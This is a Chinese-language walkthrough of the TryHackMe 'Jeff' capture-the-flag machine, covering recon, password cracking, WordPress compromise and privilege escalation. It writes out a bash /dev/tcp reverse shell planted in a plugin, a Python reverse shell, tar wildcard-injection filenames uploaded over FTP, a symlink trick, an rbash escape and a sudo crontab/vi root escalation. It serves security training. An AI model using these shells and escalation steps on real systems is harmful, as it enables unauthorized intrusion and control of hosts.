TryHackMe-Jeff

atsud0

2020-10-17

在线链接：Jeff

0x01 信息收集

1	echo 'ip jeff.thm' > /etc/hosts

NMAP

nmap -p- -sC -sV 10.10.214.2

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 7e:43:5f:1e:58:a8:fc:c9:f7:fd:4b:40:0b:83:79:32 (RSA)
|   256 5c:79:92:dd:e9:d1:46:50:70:f0:34:62:26:f0:69:39 (ECDSA)
|_  256 ce:d9:82:2b:69:5f:82:d0:f5:5c:9b:3e:be:76:88:c3 (ED25519)
80/tcp open  http    nginx
|_http-title: Jeffs Portfolio
MAC Address: 02:76:70:D3:7C:07 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

只开了两个端口，web和ssh。

SSH

[email protected]:~# nc -nv 10.10.214.2 22
(UNKNOWN) [10.10.214.2] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
^C
Protocol mismatch.
[email protected]:~# ssh 10.10.214.2
The authenticity of host '10.10.214.2 (10.10.214.2)' can't be established.
ECDSA key fingerprint is SHA256:81na22Hs/2kaLeyNJit8TG9Ba4kVYm9LhIObseJmCZM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.214.2' (ECDSA) to the list of known hosts.
[email protected]'s password:
^C

我就简单看下有没有什么隐藏信息。。

HTTP

gobuster

[email protected]:~# gobuster dir -u http://jeff.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://jeff.thm
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/16 14:07:24 Starting gobuster
===============================================================
/uploads (Status: 301)
/admin (Status: 301)
/assets (Status: 301)
/backups (Status: 301)
/source_codes (Status: 301)
===============================================================
2020/10/16 14:07:44 Finished
===============================================================

首页

uploads页面

<!DOCTYPE html>
<html>
<head>
	<title>Jeff's file uploader</title>
</head>
<body>
	
	<form action="#">
		<input type="file" name="upload_file" />
		<input type="submit" value="Upload">
	</form>	

</body>
</html>

空动作。

admin，sound_codes都是访问空白页面。backups则有个Jeff.thm的字样，assets。403

gobuster dir -u http://jeff.thm/backups/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip,gzip,rar
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://jeff.thm/backups/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     zip,gzip,rar
[+] Timeout:        10s
===============================================================
2020/10/17 05:04:53 Starting gobuster
===============================================================
/backup.zip (Status: 200)

解压需要密码。

zip2john backup.zip > zip.hash
john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
john --show zip.hash
backup.zip:!!Burningbird!!::backup.zip:backup/wpadmin.bak, backup/assets/EnlighterJS.min.js, backup/assets/MooTools-Core-1.6.0-compressed.js:backup.zip

查看wpadmin.bak

1	wordpress password is: phO#g)C5dhIWZn3BKP

有wordpress？但是没扫出来啊。。试下子域名爆破

wfuzz -c -f subdomains.txt -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://jeff.thm/" -H "Host: FUZZ.jeff.thm" --hl 1

Target: http://jeff.thm/
Total requests: 4997
==================================================================
ID      Response   Lines      Word         Chars          Request
==================================================================
00326:  C=200    346 L      1455 W        25901 Ch       "wordpress"

Total time: 0
Processed Requests: 4997
Filtered Requests: 4996
Requests/sec.: 0

接着把ip wordpress.jeff.thm追加到/etc/hosts里面

用户应该是jeff。

登陆成功

直接修改插件akismet/akismet.php，添加

1	system('bash -c "bash -i >&/dev/tcp/ip/1234 0>&1"');

改好之后直接激活即可。（直接访问目录不行，应为目标环境设置了相应目录的403权限.

0x02 提权

容器

经过一段时间信息收集后，我发现这是个docker容器。。。不过在wordpress目录下还是能找到一个有趣的文件。

<?php
/*
    Todo: I need to finish coding this database backup script.
	  also maybe convert it to a wordpress plugin in the future.
*/
$dbFile = 'db_backup/backup.sql';
$ftpFile = 'backup.sql';

$username = "backupmgr";
$password = "SuperS1ckP4ssw0rd123!";

$ftp = ftp_connect("172.20.0.1"); // todo, set up /etc/hosts for the container host

if( ! ftp_login($ftp, $username, $password) ){
    die("FTP Login failed.");
}

$msg = "Upload failed";
if (ftp_put($ftp, $remote_file, $file, FTP_ASCII)) {
    $msg = "$file was uploaded.\n";
}

echo $msg;
ftp_close($conn_id);

这里已经有一个ftp用户的凭证了，我尝试用ssh登陆这个用户，但是不成功。不过猜测上传之后，应该是会有一个打包程序在ftp服务器执行的。

新建一个以下内容的shell.sh，新建一个空文本的a.txt和b.txt

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i'])"

修改之后ftp_backup.php

<?php

$username = "backupmgr";
$password = "SuperS1ckP4ssw0rd123!";
$ftpfile_sh = "shell.sh";
$ftpfile_1="--checkpoint=1";
$ftpfile_2="--checkpoint-action=exec=sh shell.sh";

$ftp = ftp_connect("172.20.0.1"); 



if( ! ftp_login($ftp, $username, $password) ){
    echo 'die!!!';
    die("FTP Login failed.");
}

ftp_pasv($ftp, false); 

echo PHP_EOL;
print_r (ftp_nlist($ftp,"/"));

ftp_chdir($ftp,"files");
print_r (ftp_nlist($ftp,"."));
print_r (ftp_pwd($ftp));

echo ftp_put($ftp,$ftpfile_sh,"./shell.sh",FTP_ASCII);

echo ftp_put($ftp,$ftpfile_1,"./a.txt",FTP_ASCII);

echo ftp_put($ftp,$ftpfile_2,"./b.txt",FTP_ASCII);

echo PHP_EOL;
print_r (ftp_nlist($ftp,"."));


ftp_close($ftp);

搞半天终于上传成功。。看php的ftp方法时有个ftp_exec()但是我死活用不上了。。谷歌之后也不明所以。。知道的大手子可以告诉我下。

backupmgr

这里是利用tar的通配符提权，连进去之后看看crontab -l，就会发现有个定时打包的脚本了。

1
2
3

find / -user jeff -type f 2>/dev/null
/opt/systools/systool
/var/backups/jeff.bak

jeff.bak没有权限。

systool是个程序。输入1则会执行ps aux，2的话就会打印message.txt的内容，3的话就退出。

systool相同目录下有个文本

1
2
3

[email protected]:/opt/systools$ cat message.txt

Jeff, you should login with your own account to view/change your password. I hope you haven't forgotten it.

这两个文件属于同一个组 pwman,messaget.txt的话，可以直接删掉，创建一个同名的符号链接指向jeff.bak

1	ln -s /var/backups/jeff.bak message.txt

再次执行systool

1	Your Password is: 123-My-N4M3-1z-J3ff-123

我这里直接用python3 -c 'import pty;pty.spawn("/bin/bash")'但是不成功。如果是Linux环境的话可以尝试用这个方法打开tty，然后切换jeff用户。

SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xterm

jeff

ssh 登陆进jeff后，会发现这是一个该死的rbash..

[email protected]:~$ vim
-rbash: /usr/lib/command-not-found: restricted: cannot specify `/' in command names
[email protected]:~$ echo $SHELL
/bin/rbash

搜索了一下逃逸方式后，我选用了这个。

1	ssh [email protected] -t "bash --noprofile"

[email protected]:~$ sudo -l
[sudo] password for jeff:
Matching Defaults entries for jeff on tryharder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jeff may run the following commands on tryharder:
    (ALL) /usr/bin/crontab

进到crontab的编辑器会发现这是vi编辑器，所以可以直接这样提权

1	:!/bin/bash

flag

jeff user的flag

1	echo -n user.txt\|md5

root的就在root目录下